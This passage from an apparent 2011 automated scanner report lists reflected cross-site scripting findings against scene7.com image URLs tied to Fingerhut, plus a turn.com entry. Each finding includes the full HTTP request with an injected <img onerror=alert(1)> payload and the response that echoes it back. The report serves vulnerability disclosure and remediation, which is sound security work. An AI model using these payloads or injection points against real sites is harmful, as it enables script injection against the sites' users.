Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:42 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:42 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2667438275241241951&fpid=4&nu=n&t=&sp=7525b"><script>alert(1)</script>0d9ff59c63a&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.63. http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/4NL9200000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c9a7<img%20src%3da%20onerror%3dalert(1)>4bb90ff2d96 was submitted in the REST URL parameter 4. This input was echoed as 5c9a7<img src=a onerror=alert(1)>4bb90ff2d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NL9200000010_A_9995c9a7<img%20src%3da%20onerror%3dalert(1)>4bb90ff2d96?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Mon, 16 May 2011 01:38:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:08 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NL9200000010_A_9995c9a7<img src=a onerror=alert(1)>4bb90ff2d96

5.64. http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/4NP4530000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f217<img%20src%3da%20onerror%3dalert(1)>cab1e7f8316 was submitted in the REST URL parameter 4. This input was echoed as 7f217<img src=a onerror=alert(1)>cab1e7f8316 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NP4530000010_A_9997f217<img%20src%3da%20onerror%3dalert(1)>cab1e7f8316?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Mon, 16 May 2011 01:38:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NP4530000010_A_9997f217<img src=a onerror=alert(1)>cab1e7f8316

5.65. http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/4P2023GSG0010_VD_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9735b<img%20src%3da%20onerror%3dalert(1)>1263a0f8987 was submitted in the REST URL parameter 4. This input was echoed as 9735b<img src=a onerror=alert(1)>1263a0f8987 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4P2023GSG0010_VD_9999735b<img%20src%3da%20onerror%3dalert(1)>1263a0f8987?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Mon, 16 May 2011 01:38:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4P2023GSG0010_VD_9999735b<img src=a onerror=alert(1)>1263a0f8987

5.66. http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F0042_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2404c<img%20src%3da%20onerror%3dalert(1)>637bf066978 was submitted in the REST URL parameter 4. This input was echoed as 2404c<img src=a onerror=alert(1)>637bf066978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F0042_VA_9992404c<img%20src%3da%20onerror%3dalert(1)>637bf066978?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:56 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F0042_VA_9992404c<img src=a onerror=alert(1)>637bf066978

5.67. http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F1900_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9733<img%20src%3da%20onerror%3dalert(1)>2808e4fabf2 was submitted in the REST URL parameter 4. This input was echoed as f9733<img src=a onerror=alert(1)>2808e4fabf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F1900_VA_999f9733<img%20src%3da%20onerror%3dalert(1)>2808e4fabf2?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:01 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F1900_VA_999f9733<img src=a onerror=alert(1)>2808e4fabf2

5.68. http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F1962_VB_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83e01<img%20src%3da%20onerror%3dalert(1)>bd98f124f92 was submitted in the REST URL parameter 4. This input was echoed as 83e01<img src=a onerror=alert(1)>bd98f124f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F1962_VB_99983e01<img%20src%3da%20onerror%3dalert(1)>bd98f124f92?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:36 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F1962_VB_99983e01<img src=a onerror=alert(1)>bd98f124f92

5.69. http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F2553_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4ff5<img%20src%3da%20onerror%3dalert(1)>ff41e0ca3e9 was submitted in the REST URL parameter 4. This input was echoed as e4ff5<img src=a onerror=alert(1)>ff41e0ca3e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F2553_WM1_400e4ff5<img%20src%3da%20onerror%3dalert(1)>ff41e0ca3e9?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:54 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F2553_WM1_400e4ff5<img src=a onerror=alert(1)>ff41e0ca3e9

5.70. http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F5676_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd5b3<img%20src%3da%20onerror%3dalert(1)>f878d452a5d was submitted in the REST URL parameter 4. This input was echoed as cd5b3<img src=a onerror=alert(1)>f878d452a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F5676_VA_999cd5b3<img%20src%3da%20onerror%3dalert(1)>f878d452a5d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:37 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F5676_VA_999cd5b3<img src=a onerror=alert(1)>f878d452a5d

5.71. http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F6580_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4aa71<img%20src%3da%20onerror%3dalert(1)>1a9d311f4da was submitted in the REST URL parameter 4. This input was echoed as 4aa71<img src=a onerror=alert(1)>1a9d311f4da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F6580_WM1_4004aa71<img%20src%3da%20onerror%3dalert(1)>1a9d311f4da?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F6580_WM1_4004aa71<img src=a onerror=alert(1)>1a9d311f4da

5.72. http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/F8394_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8590<img%20src%3da%20onerror%3dalert(1)>cea58b0fddf was submitted in the REST URL parameter 4. This input was echoed as a8590<img src=a onerror=alert(1)>cea58b0fddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F8394_WM1_400a8590<img%20src%3da%20onerror%3dalert(1)>cea58b0fddf?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:58 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F8394_WM1_400a8590<img src=a onerror=alert(1)>cea58b0fddf

5.73. http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NA908_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6dec<img%20src%3da%20onerror%3dalert(1)>f0004a86363 was submitted in the REST URL parameter 4. This input was echoed as b6dec<img src=a onerror=alert(1)>f0004a86363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NA908_WM1_400b6dec<img%20src%3da%20onerror%3dalert(1)>f0004a86363?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:38 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NA908_WM1_400b6dec<img src=a onerror=alert(1)>f0004a86363

5.74. http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NB750_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86ccf<img%20src%3da%20onerror%3dalert(1)>60ec1845695 was submitted in the REST URL parameter 4. This input was echoed as 86ccf<img src=a onerror=alert(1)>60ec1845695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NB750_WVA_99986ccf<img%20src%3da%20onerror%3dalert(1)>60ec1845695?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:46 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NB750_WVA_99986ccf<img src=a onerror=alert(1)>60ec1845695

5.75. http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NC208_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 404ad<img%20src%3da%20onerror%3dalert(1)>62a27b752f2 was submitted in the REST URL parameter 4. This input was echoed as 404ad<img src=a onerror=alert(1)>62a27b752f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC208_WM1_400404ad<img%20src%3da%20onerror%3dalert(1)>62a27b752f2?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC208_WM1_400404ad<img src=a onerror=alert(1)>62a27b752f2

5.76. http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NC330_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18191<img%20src%3da%20onerror%3dalert(1)>ab0ea8c729c was submitted in the REST URL parameter 4. This input was echoed as 18191<img src=a onerror=alert(1)>ab0ea8c729c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC330_VA_99918191<img%20src%3da%20onerror%3dalert(1)>ab0ea8c729c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC330_VA_99918191<img src=a onerror=alert(1)>ab0ea8c729c

5.77. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NC364_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b8d30<img%20src%3da%20onerror%3dalert(1)>fb38cf8420b was submitted in the REST URL parameter 4. This input was echoed as b8d30<img src=a onerror=alert(1)>fb38cf8420b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC364_VA_999b8d30<img%20src%3da%20onerror%3dalert(1)>fb38cf8420b?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:05 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC364_VA_999b8d30<img src=a onerror=alert(1)>fb38cf8420b

5.78. http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/NC873_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed961<img%20src%3da%20onerror%3dalert(1)>74de159628d was submitted in the REST URL parameter 4. This input was echoed as ed961<img src=a onerror=alert(1)>74de159628d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC873_WM1_400ed961<img%20src%3da%20onerror%3dalert(1)>74de159628d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:42 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC873_WM1_400ed961<img src=a onerror=alert(1)>74de159628d

5.79. http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/ND797_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4cb2f<img%20src%3da%20onerror%3dalert(1)>9829a3c9865 was submitted in the REST URL parameter 4. This input was echoed as 4cb2f<img src=a onerror=alert(1)>9829a3c9865 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND797_VA_9994cb2f<img%20src%3da%20onerror%3dalert(1)>9829a3c9865?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/ND797_VA_9994cb2f<img src=a onerror=alert(1)>9829a3c9865

5.80. http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s7d5.scene7.com
Path:	/is/image/bluestembrands/ND877_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 10ce7<img%20src%3da%20onerror%3dalert(1)>0733927d8c7 was submitted in the REST URL parameter 4. This input was echoed as 10ce7<img src=a onerror=alert(1)>0733927d8c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND877_A_99910ce7<img%20src%3da%20onerror%3dalert(1)>0733927d8c7?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Mon, 16 May 2011 01:38:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:45 GMT
Connection: close
